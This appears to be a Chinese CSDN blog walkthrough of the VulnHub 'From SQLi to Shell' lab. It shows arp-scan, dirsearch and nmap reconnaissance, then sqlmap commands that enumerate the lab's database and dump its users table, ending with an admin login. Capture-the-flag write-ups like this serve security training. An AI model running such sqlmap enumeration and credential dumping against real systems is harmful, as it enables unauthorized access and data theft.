vulnhub靶机:Debian 6

最新推荐文章于 2024-11-13 10:09:56 发布
最新推荐文章于 2024-11-13 10:09:56 发布
阅读量401 收藏 4
点赞数 11
分类专栏: Vulnhub靶机 文章标签: sql 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140755747
版权

目录

开启靶机

信息收集

发现 IP

目录扫描

端口扫描

漏洞利用

查询数据库

查询当前数据库名

查询库中的表

查询表中字段

查询表中数据

登录后台

靶机下载:

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

开启靶机

然后一直下一步

信息收集

发现 IP

arp-scan -l

可以发现靶机 IP 是 192.168.109.142

目录扫描

dirsearch -u "http://192.168.109.142/" -i 200

http://192.168.109.142/admin/login.php

发现了一个登录页面,其他目录都没有什么有价值的

端口扫描

nmap -sT 192.168.109.142 -p-

发现只有 22 和 80 两个端口

访问 80 端口

http://192.168.109.142:80

点击右上角的这里发现了参数 id=1,猜测了可能有 SQL注入

漏洞利用

查询数据库

sqlmap -u http://192.168.109.142/cat.php?id=1 --dbs --batch

发现了两个数据库

查询当前数据库名

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch --current-db

查询库中的表

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog --tables

查询表中字段

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users --columns

查询表中数据

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users -C id,login,password --dump

发现了一个用户名和密码

登录后台

尝试登录一下

账号:admin
密码:P4ssw0rd

发现登录成功

燕雀安知鸿鹄之志哉.
关注
专栏目录
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
009 - VulnHub靶机:pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
Windmill_的博客
04-27 1769
pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
vulnhub靶机:Tomato
weixin_68416970的博客
08-02 1251
vulnhub靶机:Tomato。Tomato 靶机是一个用于渗透测试和漏洞研究的虚拟机,它基于 Debian 操作系统。
008 - VulnHub靶机:pWnOS2.0 学习笔记 —— PHP CMS漏洞利用+文件上传+Mysql+渗透测试思路
Windmill_的博客
04-24 1589
pWnOS2.0 靶机学习笔记,思路和过程及其详细。
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1186
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
vulnhub靶机-School: 1
臭nana的博客
02-06 2234
1、找到靶机ip:192.168.75.18 nmap -sn 192.168.75.0/24 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.18 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.75.18 Host is up (0.00042s latency). Not shown: 65532 closed ports PORT STATE
vulnhub靶机:funbox 2
J_linnb的博客
02-22 412
【代码】vulnhub靶机:funbox 2。
vulnhub靶机:funbox 5
J_linnb的博客
02-28 373
【代码】vulnhub靶机:funbox 5。
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 1007
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
vulnhub靶机渗透:PWNLAB: INIT
Mysmycbx的博客
07-11 1037
vulnhub 靶机渗透:PWNLAB:INIT
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:pWnOS: 1.0
汗的博客
03-29 2542
https://www.hackingarticles.in/hack-the-pwnos-1-0-boot-to-root/ 文章目录靶机地址利用知识信息收集Getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-10,33/ tip:如果Vmware在首次引导时询问您是复制还是移动了该虚拟机,请单击MOVED!否则,网络设置可能会混乱。 利用知识...
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1309
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
VulnHub靶机渗透】八:DC-5
野原新之助
05-07 738
靶机Web处存在文件包含漏洞,本地提权存在screen已知版本漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
PostgreSQL中表的数据量很大且索引过大时怎么办
★【World Of Moshow 郑锴】★
11-12 374
在PostgreSQL中,当表的数据量很大且索引过大时,合理评估和优化索引、使用部分索引、复合索引、调整填充因子、定期维护、使用表分区等策略可以显著提升性能。定期监控查询性能和数据库状态,以确保优化措施的有效性。
sql 对某字段以_分隔符的 进行 不足补0 转行
情随事迁个人博客
11-13 134
-- 声明输入字符串和临时表 DECLARE @inputString NVARCHAR(MAX) = 'AD_1_D1_2_3_6fff3'; DECLARE @tempTable TABLE (PartNumber INT, PaddedPart NVARCHAR(10)); -- 初始化变量 DECLARE @start INT = 1; DECLARE @end INT; DECLAR...
sql server into #t2 到临时表的几种用法
最新发布
情随事迁个人博客
11-13 256
无需创建临时表结构自动识别 INTO #t2 通常用于将查询结果集插入到一个临时表(以 # 开头的表名表示这是一个本地临时表,仅在当前会话中可见)中。以下是一些使用 INTO #t2 将数据插入到临时表的常见用法 SELECT column1, column2, ... INTO #t2 FROM SomeTable WHERE some_condition; 使用现有表结构创建临时表 如果你已经...
PostgreSQL 创建相同结构的表
云端的博客
11-11 1062
PostgreSQL 创建相同结构的表
SQL面试题——奔驰SQL面试题 车辆在不同驾驶模式下的时间
11-12 796
我们上报上来的数据包含当前的驾驶模式和当前时间戳,我们可以把下次上报上来的时间减去当前时间的差作为这个驾驶模式的形式时间,很多人可能会说要不要判断下次上来的驾驶模式是不是和当前的相当呀。如果相等作为条件,SPORT 的驾驶时长就是TS3-TS1,如果没有这个条件SPORT 的驾驶时长就是TS4-TS1。那这个问题就很简单了,我们获取下一次上报的时间和当前时间做差,当成当前驾驶模式的形式时间。前面我们已经有了每种驾驶模式的驾驶时间,我们只需要按照驾驶时间排序即可。这两个放在一起的话,我们可以这样写。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值